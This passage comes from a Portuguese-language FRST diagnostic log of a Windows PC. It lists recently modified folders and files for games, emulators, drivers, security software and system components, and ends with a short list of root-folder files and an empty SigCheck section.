____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38 2022-08-21 00:18 - 2021-06-28 07:23 - 000000000 ____D C:\Users\trean\AppData\LocalLow\Mozilla 2022-08-20 04:05 - 2021-06-28 06:45 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2022-08-19 06:40 - 2021-06-05 09:01 - 000000000 ____D C:\WINDOWS\CbsTemp 2022-08-19 05:51 - 2022-03-09 14:56 - 000000000 ____D C:\Program Files\MSBuild 2022-08-19 05:51 - 2022-03-09 14:56 - 000000000 ____D C:\Program Files (x86)\MSBuild 2022-08-19 03:00 - 2021-11-29 05:28 - 000000000 ____D C:\Users\trean\Desktop\DS4Windows 2022-08-19 01:59 - 2021-11-29 05:29 - 000000000 ____D C:\Users\trean\AppData\Roaming\DS4Windows 2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {9f9c9e51-d42f-4462-a27a-7d419da18045} 2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {58E22E6B-0E58-4E93-AF9A-036556EB66F5} 2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {1CEAC85D-2590-4760-800F-8DE5E91F3700} 2022-08-18 02:39 - 2022-02-08 01:41 - 000000000 ____D C:\Program Files\Cheat Engine 7.4 2022-08-17 00:09 - 2021-07-03 00:57 - 000000000 ____D C:\Users\trean\AppData\Roaming\Citra 2022-08-16 23:58 - 2021-06-28 05:30 - 000000000 ____D C:\Users\trean\AppData\Roaming\Adobe 2022-08-16 16:43 - 2021-06-28 05:36 - 000000000 ____D C:\Users\trean\AppData\Local\D3DSCache 2022-08-16 16:30 - 2021-06-05 09:01 - 000131072 _____ C:\WINDOWS\system32\config\ELAM 2022-08-16 16:28 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\SecurityHealth 2022-08-16 15:12 - 2021-06-28 06:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2022-08-16 07:03 - 2022-03-29 21:25 - 000000000 ____D C:\Program Files (x86)\Origin 2022-08-15 18:03 - 2022-06-15 23:05 - 000000000 ___RD C:\Users\trean\Desktop\Bomberman 2022-08-15 18:02 - 2021-07-04 00:35 - 000000000 ____D 
C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2022-08-14 15:35 - 2022-04-29 09:00 - 000000000 ____D C:\Users\trean\.dotnet 2022-08-14 05:19 - 2022-03-09 15:39 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-535022414-3499471442-1354494860-1001 2022-08-14 05:19 - 2022-03-09 15:39 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-535022414-3499471442-1354494860-1001 2022-08-14 05:19 - 2021-06-28 06:29 - 000002385 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2022-08-14 04:51 - 2021-12-21 03:12 - 000000000 ____D C:\Users\trean\AppData\Roaming\obs-studio 2022-08-13 19:38 - 2021-06-28 06:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2022-08-13 10:42 - 2022-03-09 15:15 - 000000000 ____D C:\Users\trean 2022-08-13 02:37 - 2021-06-28 07:08 - 000000000 ____D C:\Arquivos de Jogos 2022-08-12 18:25 - 2021-08-25 10:15 - 000000000 ____D C:\Users\trean\AppData\Roaming\changzhi2 2022-08-10 16:23 - 2022-03-09 15:35 - 000301888 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SystemResources 2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\bcastdvr 2022-08-10 15:39 - 2021-06-28 06:05 - 000000000 ____D C:\WINDOWS\system32\MRT 2022-08-10 15:37 - 2021-06-28 06:05 - 144534560 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2022-08-10 15:36 - 2022-03-09 15:36 - 003103744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2022-08-10 15:32 - 2021-07-07 01:52 - 000000000 ____D C:\Program Files\dotnet 2022-08-10 15:32 - 2021-06-28 06:52 - 000000000 ____D C:\ProgramData\Package Cache 2022-08-10 15:32 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\SecureBootUpdates 2022-08-09 18:17 - 2021-06-28 06:52 - 000000000 ____D 
C:\Users\trean\AppData\Local\NVIDIA 2022-08-09 07:04 - 2022-06-12 22:44 - 000000000 ____D C:\Users\trean\AppData\Local\ElevatedDiagnostics 2022-08-09 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\Registration 2022-08-09 05:24 - 2022-03-09 15:39 - 000003846 _____ C:\WINDOWS\system32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 2022-08-09 05:24 - 2021-06-29 10:42 - 000000000 ____D C:\Program Files\Bitdefender Agent 2022-08-08 20:56 - 2021-07-10 01:20 - 000000000 ____D C:\Users\trean\AppData\Roaming\RenPy 2022-08-06 02:32 - 2021-07-15 17:56 - 000000000 ____D C:\Users\trean\Desktop\an 2022-08-03 08:06 - 2022-04-01 16:03 - 000001326 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ElevenClock Settings.lnk 2022-08-03 08:06 - 2022-04-01 16:03 - 000001304 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ElevenClock.lnk 2022-08-02 16:19 - 2021-07-09 03:09 - 000000000 ____D C:\Users\trean\AppData\Roaming\Parsec 2022-08-02 12:22 - 2021-08-25 10:14 - 000000000 ____D C:\Users\trean\AppData\Roaming\XuanZhi64 2022-08-02 12:22 - 2021-08-25 10:11 - 000000000 ____D C:\LDPlayer 2022-08-02 02:24 - 2021-08-25 10:15 - 000000000 ____D C:\Users\trean\.Ld2VirtualBox 2022-07-31 05:27 - 2022-05-08 21:20 - 000000000 ____D C:\Users\trean\Desktop\Backup 2022-07-29 13:06 - 2022-04-19 02:02 - 002754000 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000402904 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000234960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000144856 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000131072 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll 2022-07-29 13:06 - 2022-04-19 02:02 - 000067032 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe 2022-07-29 08:19 - 2021-08-10 18:18 - 000000000 ____D C:\Users\trean\AppData\Roaming\yuzu 2022-07-28 18:18 - 2021-06-28 05:30 - 000000000 ____D C:\Users\trean\AppData\Local\Packages 2022-07-28 04:20 - 2022-02-14 17:13 - 007483424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll 2022-07-28 04:20 - 2022-02-14 17:13 - 006367440 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2022-07-26 21:47 - 2022-03-10 00:09 - 000003580 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d833e4979d68b7 2022-07-26 21:47 - 2022-03-09 15:39 - 000003674 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2022-07-25 07:52 - 2021-06-28 06:46 - 000000000 ____D C:\Users\trean\AppData\Local\SquirrelTemp 2022-07-24 08:57 - 2021-10-21 03:37 - 000001472 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk 2022-07-24 08:57 - 2021-10-21 03:37 - 000001464 _____ C:\Users\trean\Desktop\NVIDIA GeForce NOW.lnk 2022-07-24 08:57 - 2021-06-28 06:52 - 000000000 ____D C:\Users\trean\AppData\Local\NVIDIA Corporation 2022-07-24 05:13 - 2022-07-18 00:31 - 000000000 ____D C:\Users\trean\AppData\Roaming\BetterDiscord 2022-07-23 05:30 - 2021-06-05 15:03 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\Sysprep 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\oobe 2022-07-23 05:30 - 2021-06-05 
09:10 - 000000000 ____D C:\WINDOWS\system32\es-MX 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\Dism 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\ShellExperiences 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\Provisioning 2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2022-07-23 01:03 - 2021-08-05 23:57 - 000000000 ____D C:\Users\trean\Desktop\b 2022-07-23 00:19 - 2021-06-28 06:45 - 000001100 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk 2022-07-23 00:19 - 2021-06-28 06:45 - 000000000 ____D C:\Users\trean\AppData\Roaming\Notepad++ 2022-07-22 01:25 - 2022-02-14 17:13 - 000130216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys ==================== Arquivos na raiz de alguns diretórios ======== 2021-11-05 13:18 - 2021-11-08 01:44 - 000000032 _____ () C:\Users\trean\AppData\Roaming\.machineId 2021-08-25 10:15 - 2021-08-25 10:15 - 000000064 _____ () C:\Users\trean\AppData\Roaming\changzhi_leidian.data 2021-08-25 10:15 - 2021-10-01 13:24 - 000000050 _____ () C:\Users\trean\AppData\Roaming\changzhi_leidianmac.data 2022-08-13 02:48 - 2022-08-13 02:48 - 000001080 _____ () C:\Users\trean\AppData\Roaming\tof_launcher.reg 2022-01-18 09:11 - 2022-01-18 09:18 - 000001456 _____ () C:\Users\trean\AppData\Local\Adobe Salvar para Web 13.0 Prefs 2021-09-21 06:30 - 2021-09-21 06:30 - 000016438 _____ () C:\Users\trean\AppData\Local\partner.bmp 2022-07-31 20:40 - 2022-07-31 20:40 - 000000218 _____ () C:\Users\trean\AppData\Local\recently-used.xbel 2022-02-21 07:31 - 2022-02-21 07:31 - 000007605 _____ () C:\Users\trean\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (Não há correção automática para arquivos que não passaram na verificação.) ==================== Fim de FRST.txt ========================